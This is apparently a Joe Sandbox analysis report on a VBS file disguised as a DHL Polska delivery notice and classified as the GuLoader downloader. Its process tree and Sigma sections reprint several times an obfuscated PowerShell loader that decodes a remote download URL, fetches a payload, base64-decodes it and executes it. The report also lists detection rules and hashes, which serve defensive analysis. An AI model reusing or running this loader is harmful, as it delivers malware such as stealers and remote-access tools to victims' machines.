Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs

Overview

General Information

Sample name:DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs
renamed because original name is a hash value
Original sample name:DHL Polska_Powiadomienie oprzesyce 28036893335.vbs
Analysis ID:1466655
MD5:3b5b96bb9765b0c37f926296a205a2d6
SHA1:30ba62c4b319c4950bf70b83634bc8108c50c6da
SHA256:31a8c9d6f61346b95e41ee64547aa6160932a0f740f4a712c26b6b7f1015a588
Tags:DHLvbs
Infos:

Detection

GuLoader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7284 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 8096 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padleaare=Trosfllen 'Lu$A,Abint,ipasspeGni PkTeom,nq.iUnc,r.FoDNooCuwStnIml.ao,aa,wdKaF iU l ie .( .$ AlS.oUnv .rT.e egCll,ae OnBesBu,Ta$TuW .i .n ,dCaoI.wSustrhDeoB.p.op iKonEpgPr)Ko ';$Windowshopping=$bigthatch[0];Extensionalism (Trosfllen 'S $Cog AlFuo.obTaaP.lEn: yG nyAtm ,n aa fs.tt ke .rFonAfe,tsH,= O( RTA eGasHotNo-A.PV,aArt ,hOc o$FoWH.iS,nGadMeo SwPrsSvhTeo,ppExpU.iSlnOpgOm)Ac ');while (!$Gymnasternes) {Extensionalism (Trosfllen ' n$ hgT lbooSub,uaJolFl:PeS SkMeo ,l ieLes ,kO,eCamSuaVasIn= U$OutfirBluPreCa ') ;Extensionalism $Padleaare;Extensionalism (Trosfllen '.aS Tt.haStrDit.a-AdSUnl HeEke,lplk Ki4 H ');Extensionalism (Trosfllen 'E,$OvgT l aoS.b PaPolKo:siGAny mD,nTaaLysR,t ae r NnS,eShsRi=.e(M TExeStsU.tI,-AnPMaa ntCahNo go$PaWR,irenS.dDeoaswSvs AhProR,p ip.ii InHegBe)T ') ;Extensionalism (Trosfllen 'W,$T,g .lM,oChbfoa.alT :K.O tr trehgloFldFriCoa gBer aPrpO,hS.y o2Ru1 .7Fo= l$ ,g,yl MoDebPra SlT,:C HP eOvm TilitDeeJar uaNdtGaiDrcJ,+Pa+Be%Re$.iMHyaPolYmlMaef.o nlR a SrTr.Rac ,oHuuOtnBetEn ') ;$lovreglens=$Malleolar[$Orthodiagraphy217];}$Firetogs123=301889;$Stjrthagerne=26396;Extensionalism (Trosfllen 'P $AcgSllTio.nbGta rl,o:EnNVaoM n.esVkcE aV lBaaSerRe G.=Mi BG.ceIntSc-S.CA oS.nPrtCae CnAnt U Pa$NaW.oi,lnNudB oApwIns,nh Fo Jp Bp PiS,nReg.a ');Extensionalism (Trosfllen ',r$HogSnlOboWabBuaHelS,:DiG.uaTrl GlB u .paat,aaD.lSel Ae en SeSns n2 p9La D.=R A[ oSReyTisfrt ieCom .L.CDeo.onF.vnie.nrOvtG,]Be: D: TF Dr MoNom LBA,a osBue E6Mn4,eSS t .rH iRonB g (a $ ,N,yoRanTesPecPoaOrlCha srTr)Ly ');Extensionalism (Trosfllen 'Oc$Prg ,lAloP.b.iaFel V:P AS.bN.eRitHo2Un2 .6Ut F.=Th St[KoS ByC,sCatUne m .roTBle.hxDet K.PrEa.nSkcApoFedS iP.nlig .] r: A:FoA.rSSkCBeIC,IT,.jaG ReR,tInS Otter FiMenArgS (,e$ KGDiaKol.olFsuInpF t NaF l.gl le ,nB.eklsN,2 S9Ci).n ');Extensionalism (Trosfllen 'Li$,sgKol,eodobUla ,l.f:,aUHnnIns Ww FeErlg,tNoe vr.diStnCig,a=A $unA MbO e.pt.l2 a2Op6,i.AfsPauArb Ns MtKorKoiUdnRegBe(Pe$AiFUniDir de ,tS o,ng,asR.1Ko2Gr3Fe, T$CoSP,t BjDerF,t,lhA,aKag ae Lr.rnTie S)Cr ');Extensionalism $Unsweltering;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7204 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Democratising.Spi && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6160 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padleaare=Trosfllen 'Lu$A,Abint,ipasspeGni PkTeom,nq.iUnc,r.FoDNooCuwStnIml.ao,aa,wdKaF iU l ie .( .$ AlS.oUnv .rT.e egCll,ae OnBesBu,Ta$TuW .i .n ,dCaoI.wSustrhDeoB.p.op iKonEpgPr)Ko ';$Windowshopping=$bigthatch[0];Extensionalism (Trosfllen 'S $Cog AlFuo.obTaaP.lEn: yG nyAtm ,n aa fs.tt ke .rFonAfe,tsH,= O( RTA eGasHotNo-A.PV,aArt ,hOc o$FoWH.iS,nGadMeo SwPrsSvhTeo,ppExpU.iSlnOpgOm)Ac ');while (!$Gymnasternes) {Extensionalism (Trosfllen ' n$ hgT lbooSub,uaJolFl:PeS SkMeo ,l ieLes ,kO,eCamSuaVasIn= U$OutfirBluPreCa ') ;Extensionalism $Padleaare;Extensionalism (Trosfllen '.aS Tt.haStrDit.a-AdSUnl HeEke,lplk Ki4 H ');Extensionalism (Trosfllen 'E,$OvgT l aoS.b PaPolKo:siGAny mD,nTaaLysR,t ae r NnS,eShsRi=.e(M TExeStsU.tI,-AnPMaa ntCahNo go$PaWR,irenS.dDeoaswSvs AhProR,p ip.ii InHegBe)T ') ;Extensionalism (Trosfllen 'W,$T,g .lM,oChbfoa.alT :K.O tr trehgloFldFriCoa gBer aPrpO,hS.y o2Ru1 .7Fo= l$ ,g,yl MoDebPra SlT,:C HP eOvm TilitDeeJar uaNdtGaiDrcJ,+Pa+Be%Re$.iMHyaPolYmlMaef.o nlR a SrTr.Rac ,oHuuOtnBetEn ') ;$lovreglens=$Malleolar[$Orthodiagraphy217];}$Firetogs123=301889;$Stjrthagerne=26396;Extensionalism (Trosfllen 'P $AcgSllTio.nbGta rl,o:EnNVaoM n.esVkcE aV lBaaSerRe G.=Mi BG.ceIntSc-S.CA oS.nPrtCae CnAnt U Pa$NaW.oi,lnNudB oApwIns,nh Fo Jp Bp PiS,nReg.a ');Extensionalism (Trosfllen ',r$HogSnlOboWabBuaHelS,:DiG.uaTrl GlB u .paat,aaD.lSel Ae en SeSns n2 p9La D.=R A[ oSReyTisfrt ieCom .L.CDeo.onF.vnie.nrOvtG,]Be: D: TF Dr MoNom LBA,a osBue E6Mn4,eSS t .rH iRonB g (a $ ,N,yoRanTesPecPoaOrlCha srTr)Ly ');Extensionalism (Trosfllen 'Oc$Prg ,lAloP.b.iaFel V:P AS.bN.eRitHo2Un2 .6Ut F.=Th St[KoS ByC,sCatUne m .roTBle.hxDet K.PrEa.nSkcApoFedS iP.nlig .] r: A:FoA.rSSkCBeIC,IT,.jaG ReR,tInS Otter FiMenArgS (,e$ KGDiaKol.olFsuInpF t NaF l.gl le ,nB.eklsN,2 S9Ci).n ');Extensionalism (Trosfllen 'Li$,sgKol,eodobUla ,l.f:,aUHnnIns Ww FeErlg,tNoe vr.diStnCig,a=A $unA MbO e.pt.l2 a2Op6,i.AfsPauArb Ns MtKorKoiUdnRegBe(Pe$AiFUniDir de ,tS o,ng,asR.1Ko2Gr3Fe, T$CoSP,t BjDerF,t,lhA,aKag ae Lr.rnTie S)Cr ');Extensionalism $Unsweltering;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 3704 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Democratising.Spi && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2973558788.000000000607A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000005.00000002.3010170859.000001D066B48000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      Process Memory Space: powershell.exe PID: 8096JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 8096INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x18aac2:$b2: ::FromBase64String(
        • 0x18ab02:$b2: ::FromBase64String(
        • 0x18ab43:$b2: ::FromBase64String(
        • 0x18ab85:$b2: ::FromBase64String(
        • 0x18abc8:$b2: ::FromBase64String(
        • 0x18ac0c:$b2: ::FromBase64String(
        • 0x18ac51:$b2: ::FromBase64String(
        • 0x18ac97:$b2: ::FromBase64String(
        • 0x18acde:$b2: ::FromBase64String(
        • 0x18ad26:$b2: ::FromBase64String(
        • 0x18ad6f:$b2: ::FromBase64String(
        • 0x18adb9:$b2: ::FromBase64String(
        • 0x1b4fd3:$b2: ::FromBase64String(
        • 0x54819:$s1: -join
        • 0x549d6:$s1: -join
        • 0x8a391:$s1: -join
        • 0x8aaf1:$s1: -join
        • 0xc60c0:$s1: -join
        • 0x112f89:$s1: -join
        • 0x117de7:$s1: -join
        • 0x1c0cd6:$s1: -join
        Process Memory Space: powershell.exe PID: 6160JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Click to see the 1 entries

          Other

          SourceRuleDescriptionAuthorStrings
          amsi64_8096.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            amsi32_6160.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0xdce8:$b2: ::FromBase64String(
            • 0xcd5a:$s1: -join
            • 0x6506:$s4: +=
            • 0x65c8:$s4: +=
            • 0xa7ef:$s4: +=
            • 0xc90c:$s4: +=
            • 0xcbf6:$s4: +=
            • 0xcd3c:$s4: +=
            • 0x15dda:$s4: +=
            • 0x15e5a:$s4: +=
            • 0x15f20:$s4: +=
            • 0x15fa0:$s4: +=
            • 0x16176:$s4: +=
            • 0x161fa:$s4: +=
            • 0xd585:$e4: Get-WmiObject
            • 0xd774:$e4: Get-Process
            • 0xd7cc:$e4: Start-Process
            • 0x16a96:$e4: Get-Process

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs", CommandLine|base64offset|contains: >lvzx, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs", ProcessId: 7284, ProcessName: wscript.exe
            Sigma detected: Suspicious Copy From or To System Directory
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padleaare=Trosfllen 'Lu$A,Abint,ipasspeGni PkTeom,nq.iUnc,r.FoDNo
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs", CommandLine|base64offset|contains: >lvzx, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs", ProcessId: 7284, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu 